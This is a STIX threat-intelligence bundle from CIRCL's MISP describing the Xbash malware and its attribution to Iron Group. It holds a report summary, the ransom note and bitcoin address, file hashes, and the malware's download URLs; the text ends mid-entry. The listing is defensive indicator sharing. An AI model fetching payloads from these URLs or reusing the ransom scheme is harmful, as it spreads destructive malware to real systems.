{
|
|
"type": "bundle",
|
|
"id": "bundle--5ba1d01f-27cc-438f-9cbc-4652950d210f",
|
|
"objects": [
|
|
{
|
|
"type": "identity",
|
|
"spec_version": "2.1",
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:36.000Z",
|
|
"modified": "2018-09-19T05:21:36.000Z",
|
|
"name": "CIRCL",
|
|
"identity_class": "organization"
|
|
},
|
|
{
|
|
"type": "report",
|
|
"spec_version": "2.1",
|
|
"id": "report--5ba1d01f-27cc-438f-9cbc-4652950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:36.000Z",
|
|
"modified": "2018-09-19T05:21:36.000Z",
|
|
"name": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows",
|
|
"published": "2018-09-19T05:21:55Z",
|
|
"object_refs": [
|
|
"observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"url--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f",
|
|
"x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f",
|
|
"indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f",
|
|
"indicator--5ba1d258-c978-467b-acc6-28a2950d210f",
|
|
"indicator--5ba1d258-9f30-40cc-b608-28a2950d210f",
|
|
"indicator--5ba1d259-3908-490a-947e-28a2950d210f",
|
|
"indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f",
|
|
"indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f",
|
|
"indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f",
|
|
"indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f",
|
|
"indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f",
|
|
"indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f",
|
|
"indicator--5ba1d299-3438-4286-a1ad-4737950d210f",
|
|
"indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f",
|
|
"indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f",
|
|
"indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f",
|
|
"indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f",
|
|
"indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f",
|
|
"indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f",
|
|
"indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f",
|
|
"indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f",
|
|
"indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f",
|
|
"indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f",
|
|
"indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f",
|
|
"indicator--5ba1d4d0-bddc-4521-814d-473c950d210f",
|
|
"indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f",
|
|
"indicator--5ba1d4d1-1698-491d-a555-4331950d210f",
|
|
"indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f",
|
|
"indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f",
|
|
"indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f",
|
|
"indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f",
|
|
"indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f",
|
|
"indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f",
|
|
"indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f",
|
|
"indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f",
|
|
"indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f",
|
|
"indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f",
|
|
"indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f",
|
|
"indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f",
|
|
"indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f",
|
|
"indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f",
|
|
"indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f",
|
|
"indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f",
|
|
"indicator--5ba1d508-02d8-44e3-a778-27c3950d210f",
|
|
"indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f",
|
|
"indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f",
|
|
"indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f",
|
|
"x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f",
|
|
"x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f",
|
|
"indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f",
|
|
"indicator--5ba1d560-0e08-460b-9909-480b950d210f",
|
|
"indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f",
|
|
"x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f",
|
|
"x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f",
|
|
"x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f",
|
|
"x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f",
|
|
"indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91",
|
|
"indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564",
|
|
"indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c",
|
|
"indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7",
|
|
"indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862",
|
|
"indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
|
|
"indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e",
|
|
"indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3",
|
|
"indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
|
|
"indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63",
|
|
"indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a",
|
|
"indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
|
|
"relationship--62c44254-dfdd-46a5-8405-b822bd1e8729",
|
|
"relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d",
|
|
"relationship--3a5866c4-e62f-456c-822c-e656cef75d59",
|
|
"relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e",
|
|
"relationship--97dce8d6-48a2-4712-bd1a-378edec44abe",
|
|
"relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f",
|
|
"relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc",
|
|
"relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196",
|
|
"relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51",
|
|
"relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926",
|
|
"relationship--d20dc510-00b2-4562-862d-af956e2cd62b",
|
|
"relationship--2dd0a986-b772-4b30-b878-9e1e211e7482",
|
|
"relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574",
|
|
"relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a",
|
|
"relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6"
|
|
],
|
|
"labels": [
|
|
"Threat-Report",
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
"ms-caro-malware:malware-platform=\"Python\"",
|
|
"osint:source-type=\"blog-post\"",
|
|
"misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"",
|
|
"misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"",
|
|
"misp-galaxy:tool=\"Xbash\"",
|
|
"misp-galaxy:threat-actor=\"Iron Group\""
|
|
],
|
|
"object_marking_refs": [
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:10:42.000Z",
|
|
"modified": "2018-09-19T05:10:42.000Z",
|
|
"first_observed": "2018-09-19T05:10:42Z",
|
|
"last_observed": "2018-09-19T05:10:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--5ba1d038-785c-41d2-8712-4c5d950d210f"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\"",
|
|
"osint:source-type=\"blog-post\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:10:43.000Z",
|
|
"modified": "2018-09-19T05:10:43.000Z",
|
|
"labels": [
|
|
"misp:type=\"text\"",
|
|
"misp:category=\"External analysis\"",
|
|
"osint:source-type=\"blog-post\""
|
|
],
|
|
"x_misp_category": "External analysis",
|
|
"x_misp_type": "text",
|
|
"x_misp_value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u2019 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u2019s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, we see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015."
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:29:27.000Z",
|
|
"modified": "2018-09-19T04:29:27.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u201cPLEASE_READ_ME_XYZ\u201d, and insert a ransom message into table \u201cWARNING\u201d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:39.000Z",
|
|
"modified": "2018-09-19T04:36:39.000Z",
|
|
"description": "zlibx",
|
|
"pattern": "[file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d258-c978-467b-acc6-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:40.000Z",
|
|
"modified": "2018-09-19T04:36:40.000Z",
|
|
"description": "Xbash",
|
|
"pattern": "[file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:40.000Z",
|
|
"modified": "2018-09-19T04:36:40.000Z",
|
|
"description": "xapache",
|
|
"pattern": "[file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-3908-490a-947e-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "libhttpd",
|
|
"pattern": "[file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "XbashX",
|
|
"pattern": "[file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "XbashY",
|
|
"pattern": "[file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:42.000Z",
|
|
"modified": "2018-09-19T04:36:42.000Z",
|
|
"description": "rootv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:42.000Z",
|
|
"modified": "2018-09-19T04:36:42.000Z",
|
|
"description": "owerv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:43.000Z",
|
|
"modified": "2018-09-19T04:36:43.000Z",
|
|
"description": "rootv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:43.000Z",
|
|
"modified": "2018-09-19T04:36:43.000Z",
|
|
"description": "r88.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d299-3438-4286-a1ad-4737950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:45.000Z",
|
|
"modified": "2018-09-19T04:37:45.000Z",
|
|
"description": "tt.txt",
|
|
"pattern": "[file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:46.000Z",
|
|
"modified": "2018-09-19T04:37:46.000Z",
|
|
"description": "tg.jpg",
|
|
"pattern": "[file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:46.000Z",
|
|
"modified": "2018-09-19T04:37:46.000Z",
|
|
"description": "reg9.sct",
|
|
"pattern": "[file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:47.000Z",
|
|
"modified": "2018-09-19T04:37:47.000Z",
|
|
"description": "m.png",
|
|
"pattern": "[file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:47.000Z",
|
|
"modified": "2018-09-19T04:37:47.000Z",
|
|
"description": "tmp.jpg",
|
|
"pattern": "[file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:09.000Z",
|
|
"modified": "2018-09-19T04:47:09.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/zlibx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:09.000Z",
|
|
"modified": "2018-09-19T04:47:09.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashY']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
